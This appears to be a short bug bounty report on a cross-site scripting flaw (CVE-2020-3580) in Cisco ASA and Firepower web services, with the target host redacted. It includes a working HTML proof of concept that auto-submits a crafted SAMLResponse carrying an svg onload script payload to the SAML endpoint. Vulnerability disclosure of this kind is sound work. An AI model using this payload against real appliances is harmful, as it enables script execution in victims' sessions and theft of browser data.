XSS due to CVE-2020-3580 [██████]

Multiple vulnerabilities in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the web services interface of an affected device. Steps To Reproduce Go to this URL http://www.info-sec.cl/post-xss-███████.html HTML POC: <html> <body> <script>history.pushState('', '', '/')</script> <form action='https://'████████'/+CSCOE+/saml/sp/acs?tgname=a' method='POST'> <input type='hidden' name='SAMLResponse' value='&quot;&gt;&lt;svg&#47;onload&#61;alert&#40;document&#46;cookies&#41;&gt;'/> </form> <script> document.forms[0].submit(); </script> </body> </html> ## Impact - An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. - A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive, browser-based information. Note: These vulnerabilities affect only specific AnyConnect and WebVPN configurations. Supporting Material References https://www.exploit-db.com/exploits/47988 https://twitter.com/sagaryadav8742/status/1275170967527006208